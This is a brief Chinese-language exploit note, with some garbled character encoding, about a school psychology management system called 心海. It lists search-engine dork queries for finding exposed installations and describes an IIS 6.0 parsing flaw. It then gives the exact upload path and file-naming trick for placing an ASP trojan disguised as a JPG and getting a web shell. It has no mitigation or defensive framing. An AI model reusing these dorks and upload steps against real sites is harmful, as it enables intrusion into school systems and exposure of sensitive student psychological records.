心海學(xué)校心理管理系統(tǒng)

    漏洞類型：上傳漏洞（IIS解析漏洞）

    關(guān)鍵詞 ：1.inurl:zytest/main.asp?id=

    2.心理 inurl:article/print.asp?id=

    漏洞描述：由于IIS6.0存在解析漏洞，所以本漏洞利用方式工作于windows 系統(tǒng)平臺(tái)IIS6.0下的

    漏洞利用：inc/upload.asp?fl=1.asp;1  上傳jpg格式的asp木馬，得到shell upload/1.asp;1.jpg